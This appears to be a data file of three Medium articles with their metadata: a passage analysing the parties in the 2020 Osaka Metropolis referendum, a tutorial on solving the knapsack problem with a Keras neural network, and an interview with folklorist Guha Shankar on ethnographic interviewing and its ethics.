Komeito astonishingly failed to convince its own supporters to vote YES in the referendum: Polls before the referendum and exit polls continuously showed that no more than a third (or 40%) of the party’s supporters favored the Metropolis Plan, despite the enthusiastic support of its leadership. Yamaguchi Natsuo, the leader of Komeito and a member of the House of Councillors from Tokyo, even visited Osaka in the last weeks to campaign alongside the leaders of Ishin no Kai. It was not enough.
Press conference after the defeat: Satou Shigeki (right) & Toki Yasuo (far right) . Source: https://webronza.asahi.com/politics/articles/2020110200008.html
The effects of the defeat on the local Komeito chapter remain to be seen: Although Komeito supporters were split, its local leadership, embodied in Sato Shigeki, who represents Osaka’s 3rd district in the Diet, and Toki Yasuo, Komeito’s Secretary-General in Osaka Prefecture, was personally invested in the campaign and was defeated. Soka Gakkai, the Buddhist sect behind the party, was torn as well, and its indecisiveness likely contributed to the final defeat.
LDP「自民党」: To assess the results of the referendum for the LDP, we should distinguish between the local LDP chapter in Osaka and the national LDP led by newly elected Prime Minister Yoshihide Suga. After withstanding a lot of pressure, and internal division, the LDP chapter in Osaka in the end decided to come out against the Osaka Metropolis Plan, as it had in 2015. When the exit polls came out, over half of LDP supporters had gone along with the local leadership and opposed the plan.
After several head-to-head losses against Ishin no Kai in local elections, such as the Governor and Mayor races, this was a unique opportunity for the local LDP to regain a foothold in the city, drawing a contrast with Ishin no Kai, the party that has been dominant for more than a decade in the city of Osaka and beyond.
After a string of defeats, the LDP finally had a victory over its direct competitor for control of city (and prefectural) politics: The strength of the LDP chapter of the city of Osaka, which was overwhelmingly against the plan from the beginning, was instrumental in its defeat. In internal deliberations, they managed to turn the whole Osaka LDP group against the plan, even though LDP members at the prefectural level were much more divided and more supportive of the Osaka Metropolis Plan.
Kitano Taeko, Secretary-General of the LDP in the City of Osaka. Source: https://www.sankei.com/politics/photos/201102/plt2011020001-p1.html
Kitano Taeko「北野妙子」, the leader of the LDP in Osaka City, embodies the core demographic opposed to the Osaka Metropolis Plan: according to the polls, the worst demographics for Ishin no Kai’s plan were women and older voters, and she is a woman in her 60s.
An experienced politician, Kitano Taeko became the main face of the LDP’s opposition to the plan. She is a current four-term representative in the city council from the second most plan-supportive district, Yodogawa-Ku (55.1% YES). Keep an eye on her for future office.
Prime Minister Suga was not a winner in the referendum: Prime Minister Suga is a close ally of Ishin no Kai and its former leader Matsui Ichiro, as I explained in my previous post. That explains why he was never open and transparent about his position, or his party’s at the national level, regarding the referendum. He stayed mute the whole time, calling for respect for the people’s will and a 議論 (debate) around the issue, the same position held by LDP Secretary-General Nikai Toshihiro. The final rejection of the plan was a defeat for his local Ishin no Kai allies, who might become essential in the future for constitutional reform.
Japanese Opposition: Japanese Communist Party「共産党」and Constitutional Democratic Party of Japan「立憲民主党」: Arguably, the Japanese Opposition, formed by the JCP and the CDPJ, could be considered a winner after the defeat of the Osaka Metropolis Plan in the referendum.
In recent years, even more than the LDP, both parties have become antagonists of Ishin no Kai and its former leader, Osaka Mayor Matsui Ichiro, who wastes no time trolling them on Twitter every chance he gets. This was their revenge, and it worked out fine.
The Opposition has a problem in Osaka Prefecture, though: Osaka is one of its weakest places in the whole country. The disintegration of the old Democratic Party has not been repaired yet, and the division with the Japanese Communist Party has precluded further cooperation for some time; politicians and voters still hold old grudges from bygone times. However, this referendum provided a fantastic opportunity for the Japanese Opposition to jump-start its cooperation for future elections:
The referendum coincided with the reorganization of the CDPJ in its new form, devoid of the most conservative elements, who decided to continue with Tamaki Yuichiro in a much smaller DPFP, a new political party of two dozen members: The CDPJ was deeply involved in the campaign against the plan. Its leader, Edano Yukio, went down to Osaka to campaign and rallied his supporters towards an overwhelming (according to exit polls) rejection of the Osaka Metropolis Plan by CDPJ supporters. Exercises like this work well to build local organizations, which the party needs right now to grow beyond the single digits in Osaka.
Women, the backbone of the CDPJ and the JCP, were at the forefront of the opposition: Of the seven members the CDPJ has from Osaka Prefecture (two in single-member districts and five on the proportional representation list), two are women, and they were at the front of the campaign, crisscrossing Osaka (see photo below).
1) The leader of the CDPJ Osaka Prefecture chapter is Tsujimoto Kiyomi (right in the picture) who has been representing Osaka’s 10th district in the Lower House since 1996.
2) Otsuji Kanako (left) became part of the Lower House in 2017 representing Osaka’s 2nd district through proportional representation and has already become a recognizable face within the party, as a cadre in a growing cohort of young progressive women where Tsujimoto Kiyomi also belongs.
Members of the CDPJ (Otsuji Kanako, left & Tsujimoto Kiyomi, right) campaign against the plan in Osaka. Source: https://mainichi.jp/graphs/20201012/hpj/00m/040/002000g/6
The Japanese Communist Party, for its part, is the strongest Opposition party in Osaka, above the CDPJ. It enjoys a strong presence in the city and the prefecture, with experienced grassroots that are essential, along with citizen movements, to rally supporters to the polls. They were probably key in moving apathetic or undecided voters towards voting NO in last month’s referendum.
Yamanaka Tomoko, member of the Osaka City Council from the Japanese Communist Party. Source: http://yamanaka-tomoko.wajcp.net/category/%E3%83%96%E3%83%AD%E3%82%B0/page/2
The JCP’s campaign was also led by a woman: Yamanaka Tomoko「山中智子」a six-term member of the Osaka City Council from Joto-Ku.
Women are a central part of the Japanese Communist Party, in its leadership and among its supporters, and they showed up to reject the Osaka Metropolis Plan.
|
https://medium.com/@javierdelgadoch95/the-end-of-ishin-no-kais-dream-367c36b4a0fb
|
['Javier Delgado Chacon']
|
2021-01-03 21:41:29.236000+00:00
|
['Osakapolitics', 'Japanpolitics', 'Japan', 'Osaka']
|
Neural Knapsack
|
Neural Knapsack
In some cases in data science, it is necessary to run a specific algorithm on the output of a model to get the final result. Sometimes it is as simple as finding the index of the maximum output; other times, more advanced algorithms are needed. You may run the algorithm after running the inference. However, designing a model that can run the algorithm internally has some advantages. Solving the knapsack problem with a neural network not only lets the model run the knapsack algorithm internally but also allows the model to be trained end to end.
What is the knapsack problem?
My lovely computer algorithms teacher explained the knapsack problem to me with this story. Think of a thief on a robbery. There are some items available to be stolen. Each item has its own weight and value. The thief has a knapsack with a fixed capacity, which indicates the maximum weight he (or she) can carry. The thief’s profit is calculated by summing the chosen items’ values. Our goal is to maximize the profit while keeping the sum of the chosen items’ weights within the knapsack’s capacity.
According to Wikipedia:
“Given a set of items, each with a weight and a value, determine the number of each item to include in a collection so that the total weight is less than or equal to a given limit and the total value is as large as possible. It derives its name from the problem faced by someone who is constrained by a fixed-size knapsack and must fill it with the most valuable items”
In this article, we try to solve the knapsack problem using neural networks.
The data
The first step is to prepare data. We use random integers for items’ weights, items’ prices and the capacity of the knapsack. After creating the problem, we use brute force to find the optimum solution.
A generated knapsack problem:
Weights: [13, 10, 13, 7, 2]
Prices: [8, 7, 9, 6, 4]
Capacity: 27
Optimum solution: [0, 1, 1, 0, 1]
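The data-generation and brute-force code is not shown in the article; a minimal pure-Python sketch of the process (the default problem size and value ranges here are assumptions) might look like this:

```python
import itertools
import random

def generate_problem(n_items=5, max_weight=15, max_price=10):
    # Random integer weights and prices; the capacity is set to roughly
    # half the total weight so that a non-trivial choice has to be made.
    weights = [random.randint(1, max_weight) for _ in range(n_items)]
    prices = [random.randint(1, max_price) for _ in range(n_items)]
    capacity = sum(weights) // 2
    return weights, prices, capacity

def brute_force_solve(weights, prices, capacity):
    # Try all 2^n subsets and keep the feasible one with the highest total price.
    best_price, best_picks = 0, [0] * len(weights)
    for picks in itertools.product([0, 1], repeat=len(weights)):
        total_weight = sum(w * x for w, x in zip(weights, picks))
        total_price = sum(p * x for p, x in zip(prices, picks))
        if total_weight <= capacity and total_price > best_price:
            best_price, best_picks = total_price, list(picks)
    return best_picks

# The example problem from the article:
print(brute_force_solve([13, 10, 13, 7, 2], [8, 7, 9, 6, 4], 27))  # → [0, 1, 1, 0, 1]
```

Brute force is exponential in the number of items, which is fine for the five-item problems used here but would not scale to large instances.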
Normalizing the input is a part of every machine learning project as it helps the model to generalize better. To normalize each knapsack problem:
Divide the prices by the maximum price of the problem.
Divide the weights by the capacity.
Remove the capacity from the inputs as it is embedded in the weights now.
The normalized form of the previously created knapsack problem:
Weights: [0.48, 0.37, 0.48, 0.26, 0.07]
Prices: [0.89, 0.78, 1.00, 0.67, 0.44]
Optimum solution: [0, 1, 1, 0, 1]
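The three normalization steps can be sketched in plain Python. Note that, with the example numbers, the second normalized price is 7/9 ≈ 0.78; the rounding to two decimals below is only for display, and in practice the full-precision values would be fed to the network:

```python
def normalize_problem(weights, prices, capacity):
    # Divide weights by the capacity (so the capacity becomes 1)
    # and prices by the maximum price of the problem.
    max_price = max(prices)
    norm_weights = [round(w / capacity, 2) for w in weights]
    norm_prices = [round(p / max_price, 2) for p in prices]
    return norm_weights, norm_prices

w, p = normalize_problem([13, 10, 13, 7, 2], [8, 7, 9, 6, 4], 27)
print(w)  # → [0.48, 0.37, 0.48, 0.26, 0.07]
print(p)  # → [0.89, 0.78, 1.0, 0.67, 0.44]
```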
The dataset consists of ten thousand samples for training and two hundred for testing.
The model
The model we choose for this task is a fairly simple model. It has two inputs and an output. At first, the inputs are concatenated together. The result enters two sequential dense layers activated by sigmoid non-linearity. The output of the second dense layer is the output of the model. Implementation of the model in Keras:
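The original Keras snippet is not reproduced above. As a stand-in, here is a dependency-free sketch of the same forward pass — the two inputs concatenated, then two sigmoid-activated dense layers (the hidden size of 16 and the random initialization are assumptions):

```python
import math
import random

random.seed(0)

def init_layer(n_in, n_out):
    # Random weight matrix and zero bias for one dense layer.
    return {"W": [[random.uniform(-1, 1) for _ in range(n_out)] for _ in range(n_in)],
            "b": [0.0] * n_out}

def dense_sigmoid(inputs, layer):
    # Fully connected layer followed by the sigmoid non-linearity.
    out = []
    for j in range(len(layer["b"])):
        z = layer["b"][j] + sum(x * layer["W"][i][j] for i, x in enumerate(inputs))
        out.append(1.0 / (1.0 + math.exp(-z)))
    return out

def forward(weights_in, prices_in, hidden, output):
    x = weights_in + prices_in  # concatenate the two inputs
    return dense_sigmoid(dense_sigmoid(x, hidden), output)

n_items = 5
hidden, output = init_layer(2 * n_items, 16), init_layer(16, n_items)
out = forward([0.48, 0.37, 0.48, 0.26, 0.07], [0.89, 0.78, 1.0, 0.67, 0.44],
              hidden, output)
print(len(out))  # → 5, one sigmoid score per item
```

Because every output passes through a sigmoid, each item gets a score in (0, 1) that can later be thresholded into a pick/no-pick decision.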
The following image visualizes the architecture of the model:
Model architecture
The metrics
The knapsack problem requires metrics beyond binary classification accuracy for evaluation. The first metric we introduce is called “overpricing”. As its name suggests, it evaluates the average difference between the total price of the chosen items and that of the optimum solution. It is implemented in the Keras framework as follows:
Another vital metric is the amount of capacity used beyond the knapsack’s capacity. The “space violation” is the positive difference between the sum of the chosen items’ weights and the knapsack’s capacity. It may be implemented in Keras as follows:
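The Keras implementations of the two metrics are not shown above; framework-free sketches of the same logic (thresholding the sigmoid outputs at 0.5, and assuming the normalized capacity of 1) would be:

```python
def overpricing(batch_true, batch_pred, batch_prices):
    # Average difference between the total price of the model's picks
    # and the total price of the optimum solution.
    diffs = []
    for y_true, y_pred, prices in zip(batch_true, batch_pred, batch_prices):
        picked = sum(p * int(o > 0.5) for p, o in zip(prices, y_pred))
        optimum = sum(p * t for p, t in zip(prices, y_true))
        diffs.append(picked - optimum)
    return sum(diffs) / len(diffs)

def space_violation(batch_pred, batch_weights):
    # Average weight used beyond the normalized capacity of 1.
    violations = []
    for y_pred, weights in zip(batch_pred, batch_weights):
        used = sum(w * int(o > 0.5) for w, o in zip(weights, y_pred))
        violations.append(max(0.0, used - 1.0))
    return sum(violations) / len(violations)

# A prediction matching the optimum gives zero overpricing:
print(overpricing([[0, 1, 1, 0, 1]], [[0.1, 0.9, 0.9, 0.1, 0.9]], [[8, 7, 9, 6, 4]]))  # → 0.0
```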
Supervised approach
In the supervised approach, we input weights and prices to the model and expect the optimum solution as the output. In this process, the model is trained using the cross-entropy loss function.
After training the model with the supervised approach, we got the following results after 512 epochs.
Model results(Train/Test):
Loss: 0.24 / 0.24
Binary accuracy: 0.89 / 0.89
Space violation: 0.04 / 0.06
Overpricing: 0.06 / 0.08
Unfortunately, there are two fundamental problems with the supervised approach:
The optimum solution is mandatory to start training.
We don’t have any control over the space violation and overpricing.
We will try to address these problems in the unsupervised approach.
Unsupervised approach
We want to train the model without computing the optimum solution. Hence, we need a new loss function. Accordingly, we define w, p, c, and o as the items’ weights, the items’ prices, the knapsack’s capacity, and the model’s output, respectively. First, we need to maximize the sum of the chosen items’ prices, which may be calculated as TotalPrice = Σᵢ pᵢ·oᵢ.
Meanwhile, we want our picks not to surpass the knapsack’s capacity. This value may be formulated as SpaceViolation = max(0, Σᵢ wᵢ·oᵢ − c).
Finally, we want to maximize TotalPrice while minimizing SpaceViolation. To keep control over the SpaceViolation term, we add a λ coefficient to it, giving the final loss: Loss = −TotalPrice + λ·SpaceViolation.
We can implement the new loss in Keras like this:
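The Keras version is not reproduced here, but the per-sample logic of the loss — negative total price plus a λ-weighted capacity penalty — can be sketched in plain Python as:

```python
CVC = 5.75  # the λ coefficient (named cvc in the article's Keras implementation)

def knapsack_loss(y_pred, prices, weights, cvc=CVC):
    # -TotalPrice + λ * SpaceViolation, with the capacity normalized to 1.
    total_price = sum(p * o for p, o in zip(prices, y_pred))
    space_violation = max(0.0, sum(w * o for w, o in zip(weights, y_pred)) - 1.0)
    return -total_price + cvc * space_violation

prices = [0.89, 0.78, 1.0, 0.67, 0.44]
weights = [0.48, 0.37, 0.48, 0.26, 0.07]
# The optimum picks score better (lower loss) than greedily taking everything:
print(knapsack_loss([0, 1, 1, 0, 1], prices, weights)
      < knapsack_loss([1, 1, 1, 1, 1], prices, weights))  # → True
```

Because the loss is a smooth function of the sigmoid outputs, gradients flow through it, which is what makes end-to-end training possible.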
Using this loss function, we train the neural network in an unsupervised fashion.
Note 1: The λ parameter is named cvc in the Keras implementation of knapsack loss.
Note 2: Although we receive the optimum solution (y_true) as a function argument, we do not use it for computing the loss. We cannot omit the argument either, as Keras requires loss functions to receive both the predicted and expected outputs.
Note 3: The capacity of the knapsack is equal to 1, as we normalized the data.
After training the model with the unsupervised approach, we got the following results after 512 epochs.
Model results(Train/Test):
Loss: -1.83 / -1.75
Binary accuracy: 0.89 / 0.89
Space violation: 0.05 / 0.06
Overpricing: 0.12 / 0.14
Increasing the value of cvc (λ) will result in less space violation and less overpricing. It will also reduce the binary accuracy if increased too much. I found that a reasonable value for it might be 5.75.
Conclusion
As discussed before, we solved the knapsack problem using neural networks while letting the gradient pass through the network, so our model can be trained end to end using any variation of the back-propagation algorithm.
This approach could be used in recommender systems, especially ones that recommend multiple items under a space constraint (like banner ads).
|
https://towardsdatascience.com/neural-knapsack-8edd737bdc15
|
['Shayan Hashemi']
|
2019-08-31 15:27:33.732000+00:00
|
['Deep Learning', 'Supervised Learning', 'Unsupervised Learning', 'Knapsack Problem', 'Neural Networks']
|
It’s About the Stories that People Are Willing to Tell You: An Interview with Guha Shankar
|
Michelle Stefano: Hello, Guha, let’s first get into what brought you to ethnography and its methods…
Guha Shankar: My undergraduate degree in radio, television, and film at [the University of North Carolina] Chapel Hill is a foundational basis for the work I’ve done for the last…however long it is…and I don’t want to name the years as that would make me feel very sad and old [laughs]! So, we were exposed in classes to theories, concepts, and the technical language in media and film studies. We would talk about people doing ethnographic work, we would look at documentary films and listen to documentary audio, and so on. We also had some hands-on training in shooting film and making audio recordings, principally in a formal studio setting. But the practical experiences–and this may get to the notion of “ethnographicness”–in producing field recordings were by and large absent from our repertoire, simply because of time and resources. You know, in a department of 155 people, there was not a lot of equipment to go around, so you’d take your training where you could get it.
That experience, as limited as it was, got me into freelance jobs and TV crews when I came out of school and moved to Washington, DC, in 1983. I had gigs like production grip and occasional audio engineer. And then came a longer gig: the Smithsonian’s then Office of Folklife Programs, from 1985 to 1993. I was principally hired as a film editor and general media production specialist. There, I had this amazing experience of on-the-job training in ethnographic documentary production, and I’ll talk about three different ways in which that taught me what I know about ethnographic interviews, and ethnography in general.
First of all, I listened to hours of raw, uncut interviews and conversations…and you’re doing that in order to listen–well, this is how it works for me–for the content of the recordings and what they illustrate about the cultural and historical context of the film, right? So, from a research and scholarly perspective, that’s one hat we put on. But then you’re also listening to what piece of audio–or voice, cultural expression, dialogue–you think ought to be subsequently distilled and edited into a final product, and that’s from a production standpoint. So, at the same time, I was learning to think in both those registers.
Then, a second training ground was the [Smithsonian Folklife] Festival, and I worked every summer at its stages and got to listen to truly remarkable and sensitive folklorists conduct interviews and solicit stories on the festival grounds, on the narrative stages, during demonstrations of craft and cooking, and with a range of community members. I got this invaluable front-row seat to Alicia Gonzalez, Betty Belanus, Lynn Martin, Jim Leary, my boss Tom Vennum, Nick Spitzer, and many others engage in the art of conversation and structure it for a public audience. I was able to understand how folklorists mediate between particular community perspectives and the broader audience: the notion that you’re going from the unknown to the known, from that world of the hidden and obscure to a broader [public] audience, and that was pretty eye opening. And you had to do it within certain constraints of time and space in the festival setting.
The third training ground was accompanying scholars and folklorists out into the field on documentary film and radio productions, as production coordinator, driver, grip…you know, chief cook and bottle washer, as we often do [laughs]. I experienced firsthand what “deep hanging out” really means, right? And “deep hanging out” is a better way for me to think about what ethnographic practice actually is. These settings allowed me to see how people merged deep hanging out with journalistic sensibilities. I watched, learned, and sometimes I was able to participate in a field shoot, and observe expressions, events, occupational practices, and behaviors among and between cultural community members. I listened to my senior colleagues inquire and probe, and get into the nuances of what was going on around us.
Specific examples that were formational for me were going out with Bob McCarl, specialist in occupational folklore, on a production with DC’s firefighters for the Smithsonian Folklife Studies monograph/film series; this was the late 1980s and that project ended with lots of footage, but regrettably no completed documentary (for complicated reasons, shall we say). I worked with Frank Proschan on his research documentation with Khmu refugees, resettled in Stockton [California]: people who came to California from Southeast Asia. The last thing I worked on as production coordinator at the Smithsonian was with Frank Korom and John Bishop on a project with communities of Indo-Trinidadian Muslims. That effort resulted in Hosay Trinidad, both a book and a film, and led to my subsequent dissertation research in Jamaica. While in graduate school, I went on to work with Jake Homiak (at the Smithsonian National Anthropological Archives) and Rastafari communities in Jamaica. In those instances, I was principally the production coordinator, and the scholars did most of the interviews, but they were really generous and asked for my input not only on technical matters, but also in terms of enabling me to participate more fully in the research process, such as asking questions in the course of our filming. That was a pretty heady experience–“wow” moments, really–for someone who was used to being way behind the camera and/or microphone to get such hands-on experience in the research process.
I took these experiences with me to grad school, where I ended up doing my fieldwork in Jamaica, completing my dissertation on race, citizenship, and belonging among South Asians in the diaspora. Interestingly, grad school is not a place where people necessarily get any technical training in doing interviewing and/or ethnographic fieldwork. So, my professors found out that I had this background in ethnographic production and they’d get their students, my fellow classmates, to come and talk to me…and ask, Hey what do I do in terms of equipment? What do I do in terms of going out in the field to do a recording? This was good for my long-term practice and got me back into media documentation in a way that I hadn’t had much of a chance to do during my first years as a graduate student.
So, more recently, the AFC was where I got the chance to expand on the teaching aspect of ethnography. I was able to do that by taking the principles and methods I learned earlier and formalize them in a teaching setting, under the umbrella of the annual AFC field schools in cultural documentation training, shaped by David Taylor, former Head of Research and Programs at the AFC (my immediate boss at the time). He gave me great insight and invaluable guidance on how to translate and teach esoteric concepts that we as fieldworkers have imbibed–that is, we’ve naturalized (to invoke Bourdieu) certain ideas and skills over time and through repetition, to the extent that our practice and our methods go without saying because they come without saying. Yet, in the context of a teaching situation, you have to translate–get those esoteric techniques and approaches out of your head–and articulate them publicly and in ways that beginners will understand, practice, and reproduce in their own work.
The other key thing I learned is the crucial need to develop and record metadata–that is, the notion of developing metadata as a sustainable set of information to accompany one’s field recordings. This is not something that folklorists are trained to do, let alone scholars and professional counterparts in other fields and disciplines. It’s a pity, because if we call ourselves ethnographic practitioners, then we need to know what we’re doing with the products of our research–how to categorize and describe them to make them sustainable and useful for subsequent generations. That this is not taught as a regular part of documentary practice is no one’s fault, but this gap is what the AFC field schools addressed: integrating the methods and approaches established by those wonderful field survey projects that the Center conducted back in the 70s and 80s [e.g. the 1977 Chicago Ethnic Arts Project and the 1979 Montana Folklife Survey Project, among others]. A large, critical part of the training that AFC did during the field surveys, mostly under the guidance of Carl Fleischhauer, and Mary Hufford in several instances, was to expose fieldworkers to the concept and practice of how to contextualize and capture the “scene,” by means of documentary media, and the accompanying metadata.
And that’s what stands out about what we do at the AFC in terms of raising metadata in importance…and we do so because it makes our collections a hell of a lot easier to use and find. Maggie Kruesi, former AFC cataloger, was great at cementing that in my head when we did field schools together–that need to develop and record metadata in the field and to ensure that that step is adapted as a core principle and practice and, as such, is not ancillary or an after-thought to the documentation and the interview. So, the first thing I lead off of now in my presentations, thanks to Michael Taft [former Head of the AFC Archives], is the principle that the fieldworker is the first archivist. And now, in the digital age, as I’ve worked in the field schools for the last 15 years or so, there is this corollary that the fieldworker is the first digital content manager, because everything digital now has to be managed in some shape or form, and without that there is no product, no oral history, etc.
MS: OK, well, let me jump in. And I already feel bad, so I need to stamp this as March 26, 2019, a Tuesday…just adding in the metadata [laughter]! So, I’m going to back up a bit and unpack some of the things you’ve said. I’m using this term, “ethnographic interview,” which I think is rather broad; nonetheless, you brought up these really interesting ideas of “deep hanging out,” “conversations”…and I know there can be differences between the ethnographic interview and “oral histories.” So, can you walk us through how you define these interview types?
GS: For me, the interview that takes place in an ethnographic setting, or with an ethnographer, is only one aspect of a complex of practices, right? So, the formal sit-down interview that we’re having now occupies an hour or two of our time. But, what do you do for the other 40 hours of being out in the field? What you do for the rest of the day involves the process of deep hanging out, or “participant observation.” Every one of those moments of interaction and communication comprises ethnography, when looking at it from a broader viewpoint, and the interview is one communicative act among many others. Where I see ethnographic practice differing is in the informal give and take, and the unstructured occasions–such as over a meal, after the work day, over a beer, when you’re out with somebody who is doing subsistence farming or shucking oysters, playing music, singing. Those are the moments when greater insight into a sense of community is actualized and made apparent, right? So, ethnography approaches documentation and information gathering from a perspective attuned to nonverbal communication, embodied expressions, movement, all of which are far different paths to understanding socio-cultural life than you get by means of the oral history interview alone.
For oral history practitioners, the oral history is the focal point of the encounter. Over the course of two hours or more, they are going to conduct an interview, and that interview is going to formulate the basis of–or buttress, supplement, augment–received understandings about events that they have knowledge of through deep research, previous publications, and other sources. And the interest lies in understanding what individuals experienced and what they remember from particular moments in time, with reference to larger political, cultural phenomena. So, for the Civil Rights History Project (CRHP), we might situate an interview in the context of the principal question: What did you do during the March on Washington in 1963? What brought you to that moment? Tell us what your days were like helping organize the event. While this approach yields rich details and amazing reflections, large parts of people’s lives are less documented, simply because of the form of the encounter between interviewer and interviewee, and the subject focus, which does not provide the space to do more. In this regard, ethnographic practitioners center attention on the practice of everyday life, as much as the grander questions of history, such as Where were you when the Berlin Wall fell? Here, we also ask: How do you do things, where do you do them, who did you learn from, what are the community interactions…who are your people? Those are the kinds of things that the ethnographic interview asks about in ways that maybe other disciplinary methodologies don’t, or at least not all of the time.
Having said that, my impression, based on personal observation, is that there is a strong resonance between the types of interviews employed, meaning that both ethnographers and historians are quite comfortable with semi-directional interviews and are on the lookout for stories, rather than the “data” that a heavily structured interview might yield. Although, it is possible to say that the ethnographic approach is more eager to pick up on the tangents, the esoterica, and the deeply local ways of doing things that often surface in interviews. I mean, the interviewee recalls something quite intriguing, and while that is off the point of the ethnographer’s main interview topic, you pick up that nugget or thread and you follow it where it leads, to the extent possible.
It may be obvious, but I would also point out that ethnography is a multimodal documentary practice. While ethnographers are also invested in the efficacy and importance of eliciting memories and historical and cultural reflections by verbal communication and oral narrative–the interview format–we have other tools in our toolkit to draw upon in the technical realm, such as photography, drawings, mapping, and field notes.
MS: So, in this broader sense of observing and talking to people about a wide range of their experiences and expressions, I wonder if you could speak about the changes that can occur when bringing recording equipment into the research and interview setting–whether we are talking about a camera or an audio recorder, or an oral history or ethnographic interview. I often talk to students about how that can change the dynamics of the interview, and I’m sure you have thoughts on that.
GS: Sure. You introduce recording equipment and people shut up. Or, you introduce the equipment and you might as well have placed, you know, a cup of water on the table, because people don’t care. In all those situations, however, the thing that may present itself as an obstacle only becomes that if you present it as an obstacle; if you make more of it than it actually is…like, if you infuse the recorder with some sort of manna that it doesn’t have. I use recorders and cameras as instruments, tools, and my approach is not to hide them or minimize them; rather I point them out and say: We want to make sure we get a really good, clean recording (or a good image) and this is what we use to ensure that outcome. Today, there’s nobody anywhere anymore who is surprised by recording equipment. I have had situations where I pulled out all this bulky gear and they go, oh, my niece interviewed me the other day for a school project and she had this cute little phone–you don’t have one of those? Oh, geez! So, that’s something [the ubiquity of digital recording devices] that has certainly changed people’s perceptions of recording equipment.
As for the very act of documentation, people certainly see interviews on TV, and they have been explicit in stating some variation on the theme of don’t do to me what they do on TV, by which they mean edit the interview to make them look stupid or show them up. This was especially the case in Trinidad, where people were very sensitive to this issue of misrepresentation due to a general mistrust of negative, media portrayals from the past. And this suspicion was apparent enough that we needed to let them know that we, the camera crew, were not journalists there to do some kind of investigative hit-piece, because they knew full-well they didn’t want to be a part of that sort of thing. So, we had to tell them more than once that the project [to document Indo-Muslim public performances] was different, that it was for scholarly purposes, and so on. The privilege of working at the Library, or any cultural institution, is that I can say, what we really want to do is make sure that we add your voice to the public record, and I want to make sure that I get the best recording possible. And that’s what Bob McCarl calls “documentation in full view of the community.” Alternatively, I like to say that we’re not documenting from behind a duck blind; meaning, we’re conscious of and conscientious about letting people know what the recording is for and why we’re there. Every interview is situational, so there are no direct guidelines that have worked for me other than being open about it, because 95 percent of the time, the interviews worked fine, and the five to ten percent of the time when they don’t, I take it as my fault.
MS: So, we are getting into ethics, and I’m thinking about documentation and editing. I always wish, in an ideal world, that the person I interviewed will be in the editing suite with me, telling me where to make cuts and what they would like the finished product to say, but that is often too difficult, logistically speaking. How do you feel about the post-interview interpretation that can take place when making a short film, or whatever else–you know, the editing, interpretation, the cutting and pasting of things that didn’t happen that way in real time?
GS: Again, it’s about how transparent you are about what you’ve done, letting people know at the very beginning what’s going to happen. Most often, people are interested in making sure that you’re going to give them a fair representation. That fair representation is not something that is guaranteed in advance by you, but the more time that I’ve spent in the field with people, the more confident they are that I will represent them not just accurately, but that I will be true about the things they share. Yet, I’ve had people who say reflexively, Well, you’re gonna get a different story from somebody else, so don’t take my word for it. So, they have a sense that if I’m going to do a documentary, all those different voices will be included…and they can then decide if they’re comfortable with having all those different voices included. And, yes, you’re absolutely right this notion of “co-voicing” and collaborative editing should be the norm, but practical issues can make that too difficult.
CRHP provides a great example of where it works for us on a small scale, where all interviews we put online are full, unexpurgated interviews–although, I make a few cuts here and there to stitch together digital segments, and I have occasionally bleeped out the excessive number of “f-bombs”…you know, one or two is fine, but 25? Not so good, because the teachers [using the videos for educational purposes] would all complain! After that, what we do is return the transcript and DVD and let the interviewee know: This is what’s going out online; is there anything you want to take out, redact? Is there anything that you didn’t want to say or be made public?
During CRHP, there was an instance when we were interviewing an African American family down South. And they told us a story from the 1960s about their involvement in civil defense actions and, as many people do in the South–black and white, many different ages–if you’re old enough to shoot for food, you carry guns around, and you carry them for self-defense, as well. It’s the opposite of the KKK’s purpose of going out to kill black folk. So, this family had guns in their car, and they were being chased by police…they had to flee an event…it was a very exciting story, with different people chiming in about how they had to evade the police, because they would get all the heat for possessing firearms, whereas white folks would not. Some time after the interview, I produced what I thought was the final cut and sent it back to them with the transcript. We then got a call from our colleagues at the NMAAHC, who said that the family was very concerned about that story. They didn’t want it going online, because there might be repercussions. My first thought was, that was 60 years ago, what repercussions could there possibly be? It was a head-scratching moment, but about three weeks later, I heard that their house had been fire bombed, because white racists knew that they were being interviewed about their civil rights activism and still resented them for it. The lesson is that the consequences that people are going to take on [because of an interview] are not going to be yours since you are removed from the community, but you have to try and be aware of them and respond appropriately. So, the notion of editing, redacting, being aware of the community’s sensibilities and trials — that’s important. And you’re not going to know that without somebody guiding you through those nuances, right?
MS: Yes. Let’s continue with CRHP. I can imagine that highly sensitive, challenging, and emotional stories and experiences were often shared with you. What’s your approach to handling what are sometimes called “difficult histories,” even if that’s too light a term for some of the horrific experiences of racism and dehumanization during the fight for Civil Rights?
GS: We tend to think of “difficult histories” as coming up on issues of profound moral or political problems, such as Black Lives Matter or the Me Too Movement. But, we often don’t know what the hard histories are until we get into the middle of them. We don’t know what questions are going to trigger the hard-hitting emotions, and so the hard history is revealed right there on the spot, you know? However, that’s a reason to do this work, since we are learning all the time. It’s about the stories that people are willing to tell you, and remaining open to all of that. The only thing that I do, really, is to be as open as possible. We are not neutral recording machines; we are not the camera. The camera is recording something that we’re experiencing. We are seeing through it, so we are a mediating point, and we are giving voice to those difficult histories. Understanding that everything is situational, you listen. That’s what you do. It’s amazing…one of the sobering things that I learned through the CRHP is that PTSD is not only a condition resulting from having been in a war in some foreign corner of the world. Being on the front lines of the freedom struggle in the South was like being in a war: The trauma individuals suffered from seeing and hearing about colleagues and friends being brutalized and killed was intense and long-lasting. When you hear strong, older women with immense dignity and courage tell you that they started watching a documentary on the Civil Rights Movement and had to turn it off and go to bed, and then stayed in bed for three days because of all the trauma it brought up–after 50 years had elapsed? I mean, that’s serious!
I think it comes back to ethics. When doing the interview, or engaging the ethnographic process, there’s the golden rule to do no harm. So, in the course of an interview, you may want to ask yourself this question, Does this person really want to share this story in this particular way? And one practical consideration is to say, Can we just stop for a second? We are getting into deeply personal subjects here, maybe we can come back to this a little later. You’re giving people the chance to reflect upon whether they really want to be saying these things, because if not, then you may have to redact the story, or edit it out later, which can be challenging. But that’s part of the ethical responsibility you have: Listening to stories of trauma, or situations that are just fraught. But you don’t know in advance what’s fraught, so you have to be open to it.
I find this with students, who can get overwhelmed when someone’s sharing a deeply personal story. You need to ask, How did that person deliver or say that story? You need to read the situation, read the context. And by no means publish the story until you have a chance to tell that person what the story contains. This is just standard practice; it’s for the protection of the individual giving the story, and for the student. As an instructor, you don’t want the student to wander into trouble…and also what this might do to subsequent relationships between that person and the community, and researchers who might come after you to work in that same community. So, the idea of teaching difficult histories is about the idea of listening to them. It passes through you as the first person hearing them, and then you have to try and put that out to the public in a way that is respectful and illuminates and expands upon our historical memory.
